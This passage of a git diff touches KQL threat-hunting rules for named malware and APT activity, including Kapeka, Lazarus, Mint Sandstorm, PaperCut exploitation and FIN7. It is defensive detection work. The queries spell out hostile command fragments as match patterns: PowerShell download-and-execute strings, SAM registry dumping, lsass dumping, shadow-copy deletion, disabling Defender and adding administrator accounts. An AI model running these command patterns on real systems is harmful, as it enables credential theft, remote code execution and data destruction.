+DeviceProcessEvents | where FolderPath endswith "\\curl.exe" and ProcessCommandLine contains ".onion" and (ProcessCommandLine contains "socks5h://" or ProcessCommandLine contains "socks5://" or ProcessCommandLine contains "socks4a://") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql index 383669a1..c6787dd2 100644 --- a/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql +++ b/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql @@ -1,11 +1,11 @@ -// Title: Kapeka Backdoor Loaded Via Rundll32.EXE -// Author: Swachchhanda Shrawan Poudel -// Date: 2024-07-03 -// Level: high -// Description: Detects the Kapeka Backdoor binary being loaded by rundll32.exe. -// The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.011, detection.emerging-threats - -DeviceImageLoadEvents +// Title: Kapeka Backdoor Loaded Via Rundll32.EXE +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-07-03 +// Level: high +// Description: Detects the Kapeka Backdoor binary being loaded by rundll32.exe. +// The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.011, detection.emerging-threats + +DeviceImageLoadEvents | where (FolderPath contains ":\\ProgramData" or FolderPath contains "\\AppData\\Local\\") and FolderPath matches regex "[a-zA-Z]{5,6}\\.wll" and InitiatingProcessFolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql b/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql index 65b80b63..efd89ce0 100644 --- a/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql +++ b/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql @@ -1,14 +1,14 @@ -// Title: Katz Stealer DLL Loaded -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-05-22 -// Level: high -// Description: Detects loading of DLLs associated with Katz Stealer malware 2025 variants. -// Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems. -// The process that loads these DLLs are very likely to be malicious. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1129, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Katz Stealer DLL Loaded +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-05-22 +// Level: high +// Description: Detects loading of DLLs associated with Katz Stealer malware 2025 variants. +// Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems. +// The process that loads these DLLs are very likely to be malicious. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1129, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where FolderPath endswith "\\katz_ontop.dll" or FolderPath endswith "\\AppData\\Local\\Temp\\received_dll.dll" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql b/KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql index 1328975d..0f704d81 100644 --- a/KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql +++ b/KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql @@ -1,12 +1,12 @@ -// Title: Lace Tempest Cobalt Strike Download -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-11-09 -// Level: high -// Description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Lace Tempest Cobalt Strike Download +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-11-09 +// Level: high +// Description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "-nop -w hidden -c IEX ((new-object net.webclient).downloadstring(" and ProcessCommandLine contains "/a')" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql b/KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql index 5dc1fe91..7b577400 100644 --- a/KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql +++ b/KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql @@ -1,12 +1,12 @@ -// Title: Lace Tempest File Indicators -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-11-09 -// Level: high -// Description: Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7 -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Lace Tempest File Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-11-09 +// Level: high +// Description: Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7 +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents | where (FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles.war" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\leave") or FolderPath contains ":\\Program Files\\SysAidServer\\tomcat\\webapps\\user." \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql b/KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql index 6f520623..4d901408 100644 --- a/KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql +++ b/KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql @@ -1,12 +1,12 @@ -// Title: Lace Tempest Malware Loader Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-11-09 -// Level: high -// Description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Lace Tempest Malware Loader Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-11-09 +// Level: high +// Description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where SHA256 startswith "B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql b/KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql index b582bc74..22ef6268 100644 --- a/KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql +++ b/KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql @@ -1,12 +1,12 @@ -// Title: Lazarus Group Activity -// Author: Florian Roth (Nextron Systems), wagga -// Date: 2020-12-23 -// Level: critical -// Description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity -// MITRE Tactic: Execution -// Tags: attack.g0032, attack.execution, attack.t1059, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Lazarus Group Activity +// Author: Florian Roth (Nextron Systems), wagga +// Date: 2020-12-23 +// Level: critical +// Description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity +// MITRE Tactic: Execution +// Tags: attack.g0032, attack.execution, attack.t1059, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "reg.exe save hklm\\sam %temp%\\~reg_sam.save" or ProcessCommandLine contains "1q2w3e4r@#$@#$@#$" or ProcessCommandLine contains " -hp1q2w3e4 " or ProcessCommandLine contains ".dat data03 10000 -p ") or (ProcessCommandLine contains "netstat -aon | find " and ProcessCommandLine contains "ESTA" and ProcessCommandLine contains " > %temp%\\~") or (ProcessCommandLine contains ".255 10 C:\\ProgramData\\IBM\\" and ProcessCommandLine contains ".DAT") or ((ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\RECYCLER\\") and (ProcessCommandLine contains " /c " and ProcessCommandLine contains " -p 0x")) or ((ProcessCommandLine contains ".bin," or ProcessCommandLine contains ".tmp," or ProcessCommandLine contains ".dat," or ProcessCommandLine contains ".io," or ProcessCommandLine contains ".ini," or ProcessCommandLine contains ".db,") and (ProcessCommandLine contains "rundll32 " and ProcessCommandLine contains "C:\\ProgramData\\")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql b/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql index 63704116..558e1712 100644 --- a/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql +++ b/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql @@ -1,10 +1,10 @@ -// Title: MacOS FileGrabber Infostealer -// Author: Jason Phang Vern - Onn (Gen Digital) -// Date: 2025-09-12 -// Level: high -// Description: Detects execution of FileGrabber on macOS, which is associated with Amos infostealer campaigns targeting sensitive user files. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.002, detection.emerging-threats - -DeviceProcessEvents +// Title: MacOS FileGrabber Infostealer +// Author: Jason Phang Vern - Onn (Gen Digital) +// Date: 2025-09-12 +// Level: high +// Description: Detects execution of FileGrabber on macOS, which is associated with Amos infostealer campaigns targeting sensitive user files. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.002, detection.emerging-threats + +DeviceProcessEvents | where ProcessCommandLine contains "FileGrabber" and ProcessCommandLine contains "/tmp" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql b/KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql index b2f62614..bb9bdb08 100644 --- a/KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql +++ b/KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql @@ -1,10 +1,10 @@ -// Title: MERCURY APT Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2022-08-26 -// Level: high -// Description: Detects suspicious command line patterns seen being used by MERCURY APT -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.g0069, detection.emerging-threats - -DeviceProcessEvents +// Title: MERCURY APT Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-26 +// Level: high +// Description: Detects suspicious command line patterns seen being used by MERCURY APT +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.g0069, detection.emerging-threats + +DeviceProcessEvents | where ProcessCommandLine contains "-exec bypass -w 1 -enc" and ProcessCommandLine contains "UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql b/KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql index f9bb6ba8..df62ad21 100644 --- a/KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql +++ b/KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql @@ -1,12 +1,12 @@ -// Title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution -// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea) -// Date: 2023-04-20 -// Level: critical -// Description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution +// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea) +// Date: 2023-04-20 +// Level: critical +// Description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (InitiatingProcessFolderPath contains "aspera" and InitiatingProcessFolderPath contains "\\ruby") and ((((ProcessCommandLine contains " echo " or ProcessCommandLine contains "-dumpmode" or ProcessCommandLine contains "-ssh" or ProcessCommandLine contains ".dmp" or ProcessCommandLine contains "add-MpPreference" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "csvhost.exe" or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "ekern.exe" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "iex(" or ProcessCommandLine contains "Invoke-Expression" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains "samaccountname=" or ProcessCommandLine contains "set-MpPreference" or ProcessCommandLine contains "svhost.exe" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine contains "usoprivate" or ProcessCommandLine contains "usoshared" or ProcessCommandLine contains "whoami") or (ProcessCommandLine matches regex "[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" or ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\s+session")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe")) or (ProcessCommandLine contains "lsass" and (ProcessCommandLine contains "procdump" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "findstr")) or ((ProcessCommandLine contains "http" and FolderPath endswith "\\curl.exe") or (ProcessCommandLine contains "localgroup Administrators" and ProcessCommandLine contains "/add") or (ProcessCommandLine contains "net" and (ProcessCommandLine contains "user" and ProcessCommandLine contains "/add")) or ((ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableAntiSpyware" and ProcessCommandLine contains "\\Microsoft\\Windows Defender") or (ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableRestrictedAdmin" and ProcessCommandLine contains "CurrentControlSet\\Control\\Lsa")) or (ProcessCommandLine contains "E:jscript" or ProcessCommandLine contains "e:vbscript") or (ProcessCommandLine contains "vssadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadows") or (ProcessCommandLine contains "wbadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog") or (ProcessCommandLine contains "http" and FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "process call create") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadowcopy"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql b/KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql index e62e4237..30d8b440 100644 --- a/KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql +++ b/KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql @@ -1,10 +1,10 @@ -// Title: Mint Sandstorm - Log4J Wstomcat Process Execution -// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea) -// Date: 2023-04-20 -// Level: high -// Description: Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats - -DeviceProcessEvents +// Title: Mint Sandstorm - Log4J Wstomcat Process Execution +// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea) +// Date: 2023-04-20 +// Level: high +// Description: Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe" and (not(FolderPath endswith "\\repadmin.exe")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql b/KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql index dadbfc50..f77b004e 100644 --- a/KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql +++ b/KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql @@ -1,12 +1,12 @@ -// Title: Mint Sandstorm - ManageEngine Suspicious Process Execution -// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea) -// Date: 2023-04-20 -// Level: critical -// Description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Mint Sandstorm - ManageEngine Suspicious Process Execution +// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea) +// Date: 2023-04-20 +// Level: critical +// Description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (InitiatingProcessFolderPath contains "\\java" and (InitiatingProcessFolderPath contains "manageengine" or InitiatingProcessFolderPath contains "ServiceDesk")) and ((((ProcessCommandLine contains " echo " or ProcessCommandLine contains "-dumpmode" or ProcessCommandLine contains "-ssh" or ProcessCommandLine contains ".dmp" or ProcessCommandLine contains "add-MpPreference" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "csvhost.exe" or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "ekern.exe" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "iex(" or ProcessCommandLine contains "Invoke-Expression" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains "samaccountname=" or ProcessCommandLine contains "set-MpPreference" or ProcessCommandLine contains "svhost.exe" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine contains "usoprivate" or ProcessCommandLine contains "usoshared" or ProcessCommandLine contains "whoami") or ProcessCommandLine matches regex "[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" or ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\ssession") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe")) or (ProcessCommandLine contains "lsass" and (ProcessCommandLine contains "procdump" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "findstr")) or ((ProcessCommandLine contains "http" and FolderPath endswith "\\curl.exe") or (ProcessCommandLine contains "localgroup Administrators" and ProcessCommandLine contains "/add") or (ProcessCommandLine contains "net" and (ProcessCommandLine contains "user" and ProcessCommandLine contains "/add")) or ((ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableAntiSpyware" and ProcessCommandLine contains "\\Microsoft\\Windows Defender") or (ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableRestrictedAdmin" and ProcessCommandLine contains "CurrentControlSet\\Control\\Lsa")) or (ProcessCommandLine contains "E:jscript" or ProcessCommandLine contains "e:vbscript") or (ProcessCommandLine contains "vssadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadows") or (ProcessCommandLine contains "wbadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog") or (ProcessCommandLine contains "http" and FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "process call create") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadowcopy"))) and (not((ProcessCommandLine contains "download.microsoft.com" and ProcessCommandLine contains "manageengine.com" and ProcessCommandLine contains "msiexec"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql b/KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql index 4a3312da..60520517 100644 --- a/KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql +++ b/KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql @@ -1,12 +1,12 @@ -// Title: Onyx Sleet APT File Creation Indicators -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-10-24 -// Level: high -// Description: Detects file creation activity that is related to Onyx Sleet APT activity -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Onyx Sleet APT File Creation Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-24 +// Level: high +// Description: Detects file creation activity that is related to Onyx Sleet APT activity +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath endswith ":\\Windows\\ADFS\\bg\\inetmgr.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql b/KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql index 0ca57ef2..795a80c1 100644 --- a/KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql +++ b/KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql @@ -1,12 +1,12 @@ -// Title: PaperCut MF/NG Exploitation Related Indicators -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-25 -// Level: high -// Description: Detects exploitation indicators related to PaperCut MF/NG Exploitation -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: PaperCut MF/NG Exploitation Related Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-25 +// Level: high +// Description: Detects exploitation indicators related to PaperCut MF/NG Exploitation +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains " /c " and ProcessCommandLine contains "powershell" and ProcessCommandLine contains "-nop -w hidden" and ProcessCommandLine contains "Invoke-WebRequest" and ProcessCommandLine contains "setup.msi" and ProcessCommandLine contains "-OutFile") or (ProcessCommandLine contains "msiexec " and ProcessCommandLine contains "/i " and ProcessCommandLine contains "setup.msi " and ProcessCommandLine contains "/qn " and ProcessCommandLine contains "IntegratorLogin=fimaribahundq") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql b/KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql index b11f6a9f..e0de122d 100644 --- a/KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql +++ b/KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql @@ -1,12 +1,12 @@ -// Title: PaperCut MF/NG Potential Exploitation -// Author: Nasreddine Bencherchali (Nextron Systems), Huntress DE&TH Team (idea) -// Date: 2023-04-20 -// Level: high -// Description: Detects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Legitimate administration activity - -DeviceProcessEvents +// Title: PaperCut MF/NG Potential Exploitation +// Author: Nasreddine Bencherchali (Nextron Systems), Huntress DE&TH Team (idea) +// Date: 2023-04-20 +// Level: high +// Description: Detects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Legitimate administration activity + +DeviceProcessEvents | where (FolderPath endswith "\\bash.exe" or FolderPath endswith "\\calc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\pc-app.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql b/KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql index c4b28c6b..dce74b98 100644 --- a/KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql +++ b/KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql @@ -1,12 +1,12 @@ -// Title: Peach Sandstorm APT Process Activity Indicators -// Author: X__Junior (Nextron Systems) -// Date: 2024-01-15 -// Level: high -// Description: Detects process creation activity related to Peach Sandstorm APT -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Peach Sandstorm APT Process Activity Indicators +// Author: X__Junior (Nextron Systems) +// Date: 2024-01-15 +// Level: high +// Description: Detects process creation activity related to Peach Sandstorm APT +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "QP's*(58vaP!tF4" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql b/KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql index 19cf9ffb..f50e6cdd 100644 --- a/KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql +++ b/KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql @@ -1,12 +1,12 @@ -// Title: Potential APT10 Cloud Hopper Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2017-04-07 -// Level: high -// Description: Detects potential process and execution activity related to APT10 Cloud Hopper operation -// MITRE Tactic: Execution -// Tags: attack.execution, attack.g0045, attack.t1059.005, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential APT10 Cloud Hopper Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2017-04-07 +// Level: high +// Description: Detects potential process and execution activity related to APT10 Cloud Hopper operation +// MITRE Tactic: Execution +// Tags: attack.execution, attack.g0045, attack.t1059.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains ".vbs /shell " and FolderPath endswith "\\cscript.exe") or (ProcessCommandLine contains "csvde -f C:\\windows\\web\\" and ProcessCommandLine contains ".log") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql index bb7a3923..ffde7472 100644 --- a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql +++ b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql @@ -1,13 +1,13 @@ -// Title: Potential APT FIN7 Exploitation Activity -// Author: Alex Walston (@4ayymm) -// Date: 2024-07-29 -// Level: medium -// Description: Detects potential APT FIN7 exploitation activity as reported by Google. -// In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.t1059.003, detection.emerging-threats -// False Positives: -// - Notepad++ can legitimately spawn cmd (Open Containing Folder in CMD) - -DeviceProcessEvents +// Title: Potential APT FIN7 Exploitation Activity +// Author: Alex Walston (@4ayymm) +// Date: 2024-07-29 +// Level: medium +// Description: Detects potential APT FIN7 exploitation activity as reported by Google. +// In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.t1059.003, detection.emerging-threats +// False Positives: +// - Notepad++ can legitimately spawn cmd (Open Containing Folder in CMD) + +DeviceProcessEvents | where (FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\notepad++.exe") or (FolderPath endswith "\\notepad++.exe" and InitiatingProcessFolderPath endswith "\\rdpinit.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql index 5a68bf77..2d0933e1 100644 --- a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql +++ 